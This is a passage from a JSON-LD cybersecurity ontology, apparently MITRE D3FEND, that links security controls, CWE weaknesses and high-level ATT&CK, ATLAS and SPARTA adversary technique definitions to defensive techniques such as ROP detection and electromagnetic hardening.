      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system enforces the organization-defined limit of consecutive invalid logon attempts by a user during the organization-defined time period.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:AccountLocking"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-14T00:00:00"
      },
      "rdfs:label": "CCI-000044"
    },
    {
      "@id": "d3f:OTReadValueCommand",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Reads the contents of the specified number of consecutive parameter areawords starting from the specified word.",
      "d3f:has-participant": {
        "@id": "d3f:OTLogicVariable"
      },
      "rdfs:comment": [
        "BACnet: confirmedCOVNotification\nBACnet: subscribeCOV\nBACnet: readProperty\nBACnet: readPropertyConditional\nBACnet: readPropertyMultiple\nBACnet: unconfirmedCOVNotification\nBACnet: readRange\nBACnet: subscribeCOVProperty\nBACnet: getEventInformation\nBACnet: subscribe-cov-property-multiple\nBACnet: confirmed-cov-notification-multiple\nBACnet: unconfirmed-cov-notification-multiple ",
        "CIP: Get Attributes All\nCIP: Get Attribute List\nCIP: Get Attribute Single\nCIP: Find Next Object Instance\nCIP: Get Member ",
        "GE-SRTP: READ SYSTEM MEMORY\nGE-SRTP: READ TASK MEMORY ",
        "Modbus: Read Coils\nModbus: Read Discrete Inputs\nModbus: Read Holding Registers\nModbus: Read Input Registers\nModbus: Read FIFO Queue"
      ],
      "rdfs:label": "OT Read Value Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTReadCommand"
        },
        {
          "@id": "_:N8350373b6ef1483ba858507e4c4ec4ed"
        }
      ]
    },
    {
      "@id": "_:N8350373b6ef1483ba858507e4c4ec4ed",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTLogicVariable"
      }
    },
    {
      "@id": "d3f:SystemSoftware",
      "@type": "owl:Class",
      "d3f:definition": "Computer software which enables operating system or platform functionality.",
      "rdfs:label": "System Software",
      "rdfs:subClassOf": {
        "@id": "d3f:Software"
      }
    },
    {
      "@id": "d3f:EX-0009.03",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0009.03",
      "d3f:definition": "Using knowledge of the software composition on-board, the adversary maps components and versions to publicly or privately known defects and then crafts inputs to trigger them. Typical targets include standard libraries (libc, STL), cryptographic and compression libraries, protocol stacks (CCSDS implementations, IP over space links, SpaceWire bridges), filesystems and parsers (FITS/CCSDS packetization, custom table formats), and vendor SDKs for radios, sensors, or payloads. Triggers arrive as well-formed but malicious packets, frames, or files whose edge-case fields exercise version-specific bugs, overflowing a parser, bypassing an authentication check, or causing a kernel/driver fault that reboots into a more permissive mode. Because these flaws are documented somewhere, exploitation emphasizes matching the exact build and build-time options used on the mission.",
      "rdfs:label": "Known Vulnerability (COTS/FOSS) - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0009/03/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:EX-0009"
      },
      "skos:prefLabel": "Known Vulnerability (COTS/FOSS)"
    },
    {
      "@id": "d3f:REC-0006.01",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0006.01",
      "d3f:definition": "Threat actors enumerate the exact environment used to produce flight builds: IDEs and plugins, cross-compilers and SDKs, container images/VMs, environment variables, path conventions, build systems, static libraries, and private package registries. They correlate repository layouts (mono- vs multi-repo), branch and review policies, protected branches/tags, and CI orchestrators to find where policy gaps allow unreviewed code or tool updates. Secrets embedded in configs (tokens, service accounts), permissive compiler/linker flags, or disabled hardening options are especially valuable. Knowledge of debug/diagnostic builds, symbol servers, and crash-dump handling lets an adversary reconstruct higher-fidelity testbeds or derive function boundaries in stripped images.",
      "rdfs:label": "Development Environment - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0006/01/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:REC-0006"
      },
      "skos:prefLabel": "Development Environment"
    },
    {
      "@id": "d3f:M1025",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:related": [
        {
          "@id": "d3f:BootloaderAuthentication"
        },
        {
          "@id": "d3f:DriverLoadIntegrityChecking"
        },
        {
          "@id": "d3f:ProcessSegmentExecutionPrevention"
        },
        {
          "@id": "d3f:SystemCallFiltering"
        }
      ],
      "rdfs:label": "Privileged Process Integrity"
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-24_2",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Access Control Decisions | No User or Process Identity",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:UserAccountPermissions"
      },
      "rdfs:label": "AC-24(2)"
    },
    {
      "@id": "d3f:IndirectBranchCallAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:IndirectBranchCallAnalysis"
      ],
      "d3f:d3fend-id": "D3-IBCA",
      "d3f:definition": "Analyzing vendor specific branch call recording in order to detect ROP style attacks.",
      "d3f:kb-article": "## How it works\n\nThis technique is used to detect an attacker attempting to exploit and execute code on a target system's call stack using return-oriented programming (ROP). Modern processors that have the ability to maintain a list of the branching calls, e.g., Intel's Last Branch Recording (LBR), can be used to track and analyze indirect branching calls that are indicative of malicious activity.\n\nIn order to reduce the number of indirect branch calls to analyze to a manageable set it is assumed that malicious ROP activity will involve the use of system calls.  The technique observes indirect branch calls that are part of paths that lead to system calls, all others are ignored. Branching calls chained together is often referred to as gadgets and gadgets are often used in ROP attacks. Indirect branch calls that involve a transfer from user-space to kernel-space are of interest for this technique.\n\nIdentification of potential ROP exploit execution includes:\n\n- Inspecting the LBR when a system function call is made\n\n  - The LBR is configured to return only instruction of interest (ret, indirect jmp, indirect calls)\n\n\n- Behavior is analyzed for\n  - Ret instructions that appear to target areas not preceded by the call sites\n  - Sequences of small code fragments that appear to be chained through the indirect branching calls (gadgets)\n\n\n- Of interest are returns that appear to not render control back after calls\n  - Typical ret-call are paired\n  - gadgets will appear to have ret followed by instruction of next instruction of the following gadget\n\n\n## Considerations\n\n* May be operating system dependent since specific system calls are used to scope branching behavoir\n* Processors need to support access to a Last Branch Recording list feature\n* The size of the LBR stack can limit the expected size of the analyzed execution stack\n* If processor does not support LBR then overhead costs for the analysis can be significant",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-IndirectBranchingCalls"
      },
      "rdfs:label": "Indirect Branch Call Analysis",
      "rdfs:subClassOf": {
        "@id": "d3f:ProcessAnalysis"
      }
    },
    {
      "@id": "d3f:IntranetFileTransferTraffic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Intranet file transfer traffic is file transfer traffic that does not cross a given network's boundaries and uses a standard file transfer protocol.",
      "rdfs:label": "Intranet File Transfer Traffic",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:File_transfer"
        },
        {
          "@id": "dbr:Intranet"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:FileTransferNetworkTraffic"
        },
        {
          "@id": "d3f:IntranetNetworkTraffic"
        }
      ]
    },
    {
      "@id": "d3f:EventLogEnableEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where the event logging service is enabled, allowing it to actively collect and record logs.",
      "rdfs:label": "Event Log Enable Event",
      "rdfs:subClassOf": {
        "@id": "d3f:EventLogEvent"
      }
    },
    {
      "@id": "d3f:T1430.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1430.001",
      "d3f:definition": "An adversary may use access to cloud services (e.g. Google's Android Device Manager or Apple iCloud's Find my iPhone) or to an enterprise mobility management (EMM)/mobile device management (MDM) server console to track the location of mobile devices managed by the service.(Citation: Krebs-Location)",
      "rdfs:label": "Remote Device Management Services - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1430"
      },
      "skos:prefLabel": "Remote Device Management Services"
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_SC-3",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:ExecutionIsolation"
        },
        {
          "@id": "d3f:NetworkIsolation"
        }
      ],
      "d3f:control-name": "Security Function Isolation",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "SC-3"
    },
    {
      "@id": "d3f:T0893",
      "@type": "owl:Class",
      "d3f:attack-id": "T0893",
      "d3f:definition": "Adversaries may target and collect data from local system sources, such as file systems, configuration files, or local databases. This can include sensitive data such as specifications, schematics, or diagrams of control system layouts, devices, and processes.",
      "rdfs:label": "Data from Local System - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSCollectionTechnique"
      },
      "skos:prefLabel": "Data from Local System"
    },
    {
      "@id": "d3f:IntranetRPCNetworkTraffic",
      "@type": "owl:Class",
      "d3f:definition": "Intranet RPC network traffic is network traffic that does not cross a given network's boundaries and uses a standard remote procedure call (e.g., RFC 1050) protocol.",
      "rdfs:label": "Intranet RPC Network Traffic",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Intranet"
        },
        {
          "@id": "dbr:Remote_procedure_call"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:IntranetNetworkTraffic"
        },
        {
          "@id": "d3f:RPCNetworkTraffic"
        }
      ]
    },
    {
      "@id": "d3f:AnswerSetProgramming",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-ASP",
      "d3f:definition": "Answer set programming is a form of declarative programming based on the stable model (answer set) semantics of logic programming.",
      "d3f:kb-article": "## How it works\nAnswer set programming (ASP) is oriented towards difficult (primarily NP-hard) search problems. The computational process employed in the design of many answer set solvers is an enhancement of the DPLL algorithm and, in principle, it always terminates (unlike Prolog query evaluation, which may lead to an infinite loop).\n\nIn a more general sense, ASP includes all applications of answer sets to knowledge representation and the use of Prolog-style query evaluation for solving problems arising in these applications.\n\n## References\n1. Answer set programming. (2023, April 27). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Answer_set_programming)",
      "d3f:synonym": "ASP",
      "rdfs:label": "Answer Set Programming",
      "rdfs:subClassOf": {
        "@id": "d3f:LogicProgramming"
      }
    },
    {
      "@id": "d3f:NetworkDirectoryResource",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:Directory"
      },
      "d3f:definition": "A directory resource made available from one host to other hosts on a computer network.",
      "rdfs:label": "Network Directory Resource",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkFileShareResource"
        },
        {
          "@id": "_:N176f9fda19114c7eb8614a77975dd1f3"
        }
      ]
    },
    {
      "@id": "_:N176f9fda19114c7eb8614a77975dd1f3",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Directory"
      }
    },
    {
      "@id": "d3f:CWE-579",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-579",
      "d3f:definition": "The product stores a non-serializable object as an HttpSession attribute, which can hurt reliability.",
      "rdfs:label": "J2EE Bad Practices: Non-serializable Object Stored in Session",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-573"
      }
    },
    {
      "@id": "d3f:CWE-657",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-657",
      "d3f:definition": "The product violates well-established principles for secure design.",
      "rdfs:label": "Violation of Secure Design Principles",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-710"
      }
    },
    {
      "@id": "d3f:CWE-1039",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1039",
      "d3f:definition": "The product uses an automated mechanism such as machine learning to recognize complex data inputs (e.g. image or audio) as a particular concept or category, but it does not properly detect or handle inputs that have been modified or constructed in a way that causes the mechanism to detect a different, incorrect concept.",
      "rdfs:label": [
        "Automated Recognition Mechanism with Inadequate Detection or Handling of Adversarial Input Perturbations",
        "Inadequate Detection or Handling of Adversarial Input Perturbations in Automated Recognition Mechanism"
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-693"
        },
        {
          "@id": "d3f:CWE-697"
        }
      ]
    },
    {
      "@id": "d3f:InputFunction",
      "@type": "owl:Class",
      "d3f:definition": "Generic function that receives input from an untrusted source.",
      "rdfs:label": "Input Function",
      "rdfs:subClassOf": {
        "@id": "d3f:Subroutine"
      }
    },
    {
      "@id": "d3f:AML.T0025",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0025",
      "d3f:definition": "Adversaries may exfiltrate AI artifacts or other information relevant to their goals via traditional cyber means.\n\nSee the ATT&CK [Exfiltration](https://attack.mitre.org/tactics/TA0010/) tactic for more information.",
      "rdfs:label": "Exfiltration via Cyber Means - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0025"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASExfiltrationTechnique"
      },
      "skos:prefLabel": "Exfiltration via Cyber Means"
    },
    {
      "@id": "d3f:T1556",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1556",
      "d3f:definition": "Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).",
      "d3f:modifies": {
        "@id": "d3f:AuthenticationService"
      },
      "rdfs:label": "Modify Authentication Process",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CredentialAccessTechnique"
        },
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "_:N99c3942035f345df9bf73ad0cdc96985"
        }
      ]
    },
    {
      "@id": "_:N99c3942035f345df9bf73ad0cdc96985",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AuthenticationService"
      }
    },
    {
      "@id": "d3f:HardwareClock",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A clock implemented using physical electronic components, typically providing timekeeping independent of system power or software state.",
      "rdfs:label": "Hardware Clock",
      "rdfs:seeAlso": {
        "@id": "https://linux.die.net/man/8/clock"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Clock"
        },
        {
          "@id": "d3f:HardwareDevice"
        }
      ]
    },
    {
      "@id": "d3f:AML.TA0001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "d3f:attack-id": "AML.TA0001",
      "d3f:definition": "The adversary is leveraging their knowledge of and access to the target system to tailor the attack.\n\nAI Attack Staging consists of techniques adversaries use to prepare their attack on the target AI model.\nTechniques can include training proxy models, poisoning the target model, and crafting adversarial data to feed the target model.\nSome of these techniques can be performed in an offline manner and are thus difficult to mitigate.\nThese techniques are often used to achieve the adversary's end goal.",
      "rdfs:label": "AI Attack Staging - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/tactics/AML.TA0001"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "AI Attack Staging"
    },
    {
      "@id": "d3f:T1136.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1136.003",
      "d3f:creates": {
        "@id": "d3f:CloudUserAccount"
      },
      "d3f:definition": "Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users)",
      "rdfs:label": "Cloud Account",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1136"
        },
        {
          "@id": "_:N31856ab35c6649db85380c6f742ac6ff"
        }
      ]
    },
    {
      "@id": "_:N31856ab35c6649db85380c6f742ac6ff",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CloudUserAccount"
      }
    },
    {
      "@id": "d3f:d3fend-kb-annotation-property",
      "@type": "owl:AnnotationProperty",
      "d3f:definition": "x d3fend-kb-annotation-property y: The entity x had the d3fend kb annotation y.",
      "rdfs:label": "d3fend-kb-annotation-property",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-annotation"
      }
    },
    {
      "@id": "d3f:OffensiveAction",
      "@type": "owl:Class",
      "rdfs:label": "Offensive Action",
      "rdfs:subClassOf": {
        "@id": "d3f:CyberAction"
      }
    },
    {
      "@id": "d3f:T1144",
      "@type": "owl:Class",
      "d3f:attack-id": "T1144",
      "d3f:definition": "In macOS and OS X, when applications or programs are downloaded from the internet, there is a special attribute set on the file called <code>com.apple.quarantine</code>. This attribute is read by Apple's Gatekeeper defense program at execution time and provides a prompt to the user to allow or deny execution.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1553.001",
      "rdfs:label": "Gatekeeper Bypass",
      "rdfs:seeAlso": {
        "@id": "d3f:T1553.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:ClockEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event involving a clock artifact, characterized by changes to or readings from a timekeeping mechanism that maintains a representation of temporal progression.",
      "rdfs:label": "Clock Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalEvent"
        },
        {
          "@id": "_:N867e5d22944e4cc88fe0d8480caa95ac"
        }
      ]
    },
    {
      "@id": "_:N867e5d22944e4cc88fe0d8480caa95ac",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Clock"
      }
    },
    {
      "@id": "d3f:T1475",
      "@type": "owl:Class",
      "d3f:attack-id": "T1475",
      "d3f:definition": "Malicious applications are a common attack vector used by adversaries to gain a presence on mobile devices. Mobile devices often are configured to allow application installation only from an authorized app store (e.g., Google Play Store or Apple App Store). An adversary may seek to place a malicious application in an authorized app store, enabling the application to be installed onto targeted devices.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been deprecated.",
      "rdfs:label": "Deliver Malicious App via Authorized App Store - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileInitialAccessTechnique"
      },
      "skos:prefLabel": "Deliver Malicious App via Authorized App Store"
    },
    {
      "@id": "d3f:Perturbation-basedLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-PBL",
      "d3f:definition": "Perturbation based methods are proposed under the smoothness assumption, which indicates that two data points close to each other in feature space are likely to have the same label.",
      "d3f:kb-article": "## References\nZheng, Y., & Song, Y. (2021). An Effective Perturbation-Based Semi-Supervised Learning Method for Acoustic Event Classification. IEEE/ACM Transactions on Audio, Speech, and Language Processing, 29, 3580-3591. [Link](https://www.semanticscholar.org/paper/An-Effective-Perturbation-Based-Semi-Supervised-for-Zheng-Song/b75ae37d137ac354eb2ed42917e461b4dccdc977).\n\nEngelen, S., & Hoos, H. (2020). A survey on semi-supervised learning. Machine Learning, 109(2), 299-337. [Link](https://link.springer.com/article/10.1007/s10994-019-05855-6).",
      "rdfs:label": "Perturbation-based Learning",
      "rdfs:subClassOf": {
        "@id": "d3f:IntrinsicallySemi-supervisedLearning"
      }
    },
    {
      "@id": "d3f:CCI-001556_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system uniquely authenticates destination domains for information transfer.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:DomainTrustPolicy"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2010-05-11T00:00:00"
      },
      "rdfs:label": "CCI-001556"
    },
    {
      "@id": "d3f:AML.T0044",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0044",
      "d3f:definition": "Adversaries may gain full \"white-box\" access to an AI model.\nThis means the adversary has complete knowledge of the model architecture, its parameters, and class ontology.\nThey may exfiltrate the model to [Craft Adversarial Data](/techniques/AML.T0043) and [Verify Attack](/techniques/AML.T0042) in an offline where it is hard to detect their behavior.",
      "rdfs:label": "Full AI Model Access - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0044"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASAIModelAccessTechnique"
      },
      "skos:prefLabel": "Full AI Model Access"
    },
    {
      "@id": "d3f:T1628.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1628.002",
      "d3f:definition": "Adversaries may attempt to avoid detection by hiding malicious behavior from the user. By doing this, an adversary’s modifications would most likely remain installed on the device for longer, allowing the adversary to continue to operate on that device.",
      "rdfs:label": "User Evasion - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1628"
      },
      "skos:prefLabel": "User Evasion"
    },
    {
      "@id": "d3f:CWE-1290",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1290",
      "d3f:definition": "The product implements a decoding mechanism to decode certain bus-transaction signals to security identifiers. If the decoding is implemented incorrectly, then untrusted agents can now gain unauthorized access to the asset.",
      "rdfs:label": "Incorrect Decoding of Security Identifiers",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "d3f:DynamicAnalysisTool",
      "@type": "owl:Class",
      "d3f:definition": "Dynamic program analysis is the analysis of computer software that is performed by executing programs on a real or virtual processor.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Dynamic_program_analysis"
      },
      "rdfs:label": "Dynamic Analysis Tool",
      "rdfs:subClassOf": {
        "@id": "d3f:CodeAnalyzer"
      }
    },
    {
      "@id": "d3f:T1069.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1069.003",
      "d3f:definition": "Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.",
      "rdfs:label": "Cloud Groups",
      "rdfs:subClassOf": {
        "@id": "d3f:T1069"
      }
    },
    {
      "@id": "d3f:OffensiveTactic",
      "@type": "owl:Class",
      "d3f:definition": "Per ATT&CK, these are defined as Tactical Goals, not Tactics per se. Many children also fit definition of tactics.  Some are neither tactics or tactical goals really (e.g., Execution, which is a useful grouping, but an action, not really a tactic or technique.",
      "d3f:synonym": "Tactical Objective",
      "rdfs:isDefinedBy": {
        "@id": "https://attack.mitre.org/docs/ATTACK_Design_and_Philosophy_March_2020.pdf"
      },
      "rdfs:label": "Offensive Tactic",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Goal"
        },
        {
          "@id": "_:Ne894e9f6c10d4282adcebb19165230e6"
        }
      ]
    },
    {
      "@id": "_:Ne894e9f6c10d4282adcebb19165230e6",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enabled-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OffensiveTechnique"
      }
    },
    {
      "@id": "d3f:AML.T0002",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0002",
      "d3f:definition": "Adversaries may search public sources, including cloud storage, public-facing services, and software or data repositories, to identify AI artifacts.\nThese AI artifacts may include the software stack used to train and deploy models, training and testing data, model configurations and parameters.\nAn adversary will be particularly interested in artifacts hosted by or associated with the victim organization as they may represent what that organization uses in a production environment.\nAdversaries may identify artifact repositories via other resources associated with the victim organization (e.g. [Search Victim-Owned Websites](/techniques/AML.T0003) or [Search Open Technical Databases](/techniques/AML.T0000)).\nThese AI artifacts often provide adversaries with details of the AI task and approach.\n\nAI artifacts can aid in an adversary's ability to [Create Proxy AI Model](/techniques/AML.T0005).\nIf these artifacts include pieces of the actual model in production, they can be used to directly [Craft Adversarial Data](/techniques/AML.T0043).\nAcquiring some artifacts requires registration (providing user details such email/name), AWS keys, or written requests, and may require the adversary to [Establish Accounts](/techniques/AML.T0021).\n\nArtifacts might be hosted on victim-controlled infrastructure, providing the victim with some information on who has accessed that data.",
      "rdfs:label": "Acquire Public AI Artifacts - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASResourceDevelopmentTechnique"
      },
      "skos:prefLabel": "Acquire Public AI Artifacts"
    },
    {
      "@id": "d3f:T1574",
      "@type": "owl:Class",
      "d3f:attack-id": "T1574",
      "d3f:definition": "Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as application control or other restrictions on execution.",
      "rdfs:label": "Hijack Execution Flow",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        }
      ]
    },
    {
      "@id": "d3f:CWE-1389",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1389",
      "d3f:definition": "The product parses numeric input assuming base 10 (decimal) values, but it does not account for inputs that use a different base number (radix).",
      "rdfs:label": "Incorrect Parsing of Numbers with Different Radices",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-704"
      }
    },
    {
      "@id": "d3f:WebAuthentication",
      "@type": "owl:Class",
      "d3f:definition": "A request-response comprising a user credential presentation to a system and a verification response where the verifying party is a web server.",
      "rdfs:label": "Web Authentication",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Authentication"
        },
        {
          "@id": "_:Nbd9fcfb4449e46ec9906c83412137f44"
        }
      ]
    },
    {
      "@id": "_:Nbd9fcfb4449e46ec9906c83412137f44",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-create"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SessionCookie"
      }
    },
    {
      "@id": "d3f:Person",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A person is a human being.",
      "rdfs:label": "Person",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Agent"
        },
        {
          "@id": "_:N723fb6f204e54b14bfdbb68391ddc86c"
        }
      ]
    },
    {
      "@id": "_:N723fb6f204e54b14bfdbb68391ddc86c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:name"
      },
      "owl:someValuesFrom": {
        "@id": "xsd:string"
      }
    },
    {
      "@id": "d3f:ElectromagneticRadiationHardening",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ElectromagneticRadiationHardening"
      ],
      "d3f:d3fend-id": "D3-EMH",
      "d3f:definition": "The application of physical and material-level design measures to electronic systems, components, or facilities to reduce their susceptibility to damage or disruption from electromagnetic threats.",
      "d3f:kb-article": "## How it works\nEM hardening operates on the principle of controlling the coupling path between an electromagnetic threat and the sensitive electronics it could affect. At the most fundamental level, this involves creating barriers that reflect, absorb, or redirect unwanted electromagnetic energy before it can induce damaging or disruptive currents in protected circuitry. The physical mechanisms exploited include the Faraday cage effect (conductive enclosures that attenuate external fields), skin-depth shielding (where conductive materials dissipate high-frequency fields before they penetrate), and transient suppression components (such as surge protectors and ferrite chokes) that clamp induced voltages at I/O interfaces.\n\nFor threats at higher energy levels or involving ionizing radiation, such as nuclear EMP (NEMP) or space radiation, hardening extends beyond shielding to encompass radiation-tolerant component selection, redundant circuit architectures, and layout practices that minimize antenna-like structures susceptible to field coupling. The approach is inherently defense-in-depth: no single measure provides complete protection, so hardened systems typically layer multiple techniques across the facility, chassis, board, and component levels.\n\n## Considerations\n* Threat scope must be defined early: design choices differ significantly between defending against ambient RFI, conducted EMI on power lines, intentional jamming, HEMP (High-Altitude EMP), or ionizing radiation in space or nuclear environments.\n* Hardening can conflict with thermal management: fully sealed enclosures that maximize shielding often restrict airflow, requiring careful thermal design trade-offs.\n* Testing and certification are mandatory for assurance: claimed shielding effectiveness must be validated through standardized testing (e.g., IEEE 299, MIL-STD-461) rather than inferred from design alone.\n* Maintenance can degrade hardening: field modifications, connector re-terminations, or enclosure repairs can inadvertently introduce shielding gaps, necessitating re-verification procedures.\n",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-SystemAndMethodForProvidingCertifiableElectromagneticPulseAndRFIProtection_InstantAccessNetworksLLC"
      },
      "d3f:synonym": "EM Hardening",
      "rdfs:isDefinedBy": {
